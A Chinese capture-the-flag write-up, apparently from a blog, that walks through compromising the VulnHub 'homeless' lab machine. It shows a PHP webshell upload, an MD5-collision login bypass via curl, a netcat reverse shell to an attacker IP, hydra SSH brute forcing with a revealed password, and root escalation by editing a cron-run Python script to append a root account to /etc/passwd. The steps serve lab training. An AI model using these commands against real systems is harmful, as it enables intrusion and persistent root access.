仅供个人娱乐

靶机信息

下载地址:https://www.vulnhub.com/entry/homeless-1,215/

一、主机扫描

二、信息收集

在网页源码和页面上,我们发现User-Agent

三、漏洞利用

在agaent字段填上这个图片的字段 “Cyber​​dog Sledding Portal”

或使用字典:rockyou,来爆这个UA

打开该网页

上传小马

上传命令

<?=`ls`;                   #这句代码在php里等同于<?php echo `ls`;?>,是这段代码的缩写

注意这里一定是反引号,否则无法解析

访问相关文件

访问相关txt文件ip

信息收集

逻辑就是username、password、code两两不相等,但是三者的md5相等,要求post提交的3个参数不能两两相同,但是要求md5的值相同

百度信息收集

https://github.com/thereal1024/python-md5-collision

$ sudo apt-get install libboost-all-dev

cd python-md5-collision-master

python3 gen_coll_test.py

curl命令传输文件

选三个文件,直接用curl命令传输过去

curl传输的用法 https://ec.haxx.se/http/http-post

使用的参数:--data-urlencodeHTTP POST data url encoded

curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/ -i

获取到了一个SESSION      eec1n77li90bsc5av8sp5k5q10

在浏览器中,F12,修改该Cookie值

访问

http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/admin.php就进后台了

反弹
nc -e /bin/bash 192.168.56.129 4444

输入

python -c 'import pty; pty.spawn("/bin/bash")'

进行信息收集

从python文件入手

find / -type f -user downfall 2>/dev/null  #除了用户目录多了个邮件但是没权限

find / -type f -group downfall 2>/dev/null  #查找属于downfall组的文件

find / -type f -perm -u=s 2>dev/null  查看sudo文件

爆破ssh

hydra -l downfall -P /usr/share/wordlists/rockyou.txt -t 5 ssh://192.168.56.128

 

ssh downfall@192.168.56.128

secretlyinlove

进行信息收集

 

计划任务每分钟执行一次homeless.py脚本,及报错信息

第一种方式提权

vim /lib/logs/homeless.py

修改脚本

获取权限成功

第二种方式提权

直接用homeless写/etc/passwd文件

生成密码

perl -e 'print crypt("HUA123",q($6$hoiLHdTI)) ."\n"'

得到信息

$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/

更改python文件内容为

vim /lib/logs/homeless.py

#! /usr/bin/python

f = open("/etc/passwd",'a')

f.write('xiao:$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/:0:0::/root:/bin/bash')

f.close()

print "hello"

 

 

成功创建root权限账户

参考文章https://www.cnblogs.com/A1oe/p/12694954.html

homeless靶机的更多相关文章

  1. Vulnhub homeless靶机渗透

    信息搜集 nmap -sP 192.168.146.6 nmap -A -Pn 192.168.146.151 直接访问web服务. 大概浏览一下没发现什么,直接扫描下目录把dirb+bp. BP具体 ...

  2. (28)A practical way to help the homeless find work and safety

    https://www.ted.com/talks/richard_j_berry_a_practical_way_to_help_the_homeless_find_work_and_safety/ ...

  3. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  4. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  5. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

  6. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  7. Fowsniff: 1靶机入侵

    一.信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...

  8. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  9. Moonraker:1靶机入侵

      0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...

随机推荐

  1. Java进阶 | 泛型机制与反射原理

    一.泛型的概念 1.基础案例 泛型在Java中的应用非常广泛,最常见则是在集合容器中,先看下基础用法: public class Generic01 { public static void main ...

  2. Android集合中对象排序

    如果将集合中的对象进行排序,最近使用了一个简单的方法解决了,随笔记下来. 主要思路: 首先,新建类实现Comparator<?>,这个类是做比较的关键类,一般做比较的类型 int 或 St ...

  3. Pytest学习笔记9-失败重跑

    前言 在进行自动化测试的过程中,我们一定会有这样的需求:希望失败的用例可以自动重跑 在pytest中,提供了pytest-rerunfailures插件可以实现自动重跑的效果 插件安装 pip命令安装 ...

  4. 【春节歌曲回味 | STM32小音乐盒 】PWM+定时器驱动无源蜂鸣器(STM32 HAL库)

    l  STM32通过PWM与定时器方式控制无源蜂鸣器鸣响 l  STM32小音乐盒,歌曲进度条图形显示与百分比显示,歌曲切换 l  编程使用STM32 HAL库 l  IIC OLED界面编程,动画实 ...

  5. hdu 3397 Sequence operation 线段树 区间更新 区间合并

    题意: 5种操作,所有数字都为0或1 0 a b:将[a,b]置0 1 a b:将[a,b]置1 2 a b:[a,b]中的0和1互换 3 a b:查询[a,b]中的1的数量 4 a b:查询[a,b ...

  6. POJ 1681 高斯消元 枚举自由变元

    题目和poj1222差不多,但是解法有一定区别,1222只要求出任意一解,而本题需要求出最少翻转次数.所以需要枚举自由变元,变元数量为n,则枚举的次数为1<<n次 #include < ...

  7. 『无为则无心』Python函数 — 27、Python函数的返回值

    目录 1.返回值概念 2.return关键字的作用 3.返回值可以返回的数据类型 4.函数如何返回多个值 5.fn5 和 fn5()的区别 6.总结: 1.返回值概念 例如:我们去超市购物,比如买饮料 ...

  8. 1.3.3、通过Header属性匹配

    server: port: 8080 spring: application: name: gateway cloud: gateway: routes: - id: guo-system4 uri: ...

  9. Java 内存泄漏知多少?

    先看再点赞,给自己一点思考的时间,如果对自己有帮助,微信搜索[程序职场]关注这个执着的职场程序员.我有什么:职场规划指导,技能提升方法,讲不完的职场故事,个人成长经验. 面试的时候内存管理是不是很多面 ...

  10. B站挂了之后出现的tengine是个啥?

    一.描述 晚上刚洗漱完之后听同学说:B站挂了?woc?真挂了? 嗯!确实挂了,404的状态码,懂的都懂. 不过,最下面的tengine字眼吸引了我的注意,一时兴起,打算看看它是个什么东西,起码搞一个h ...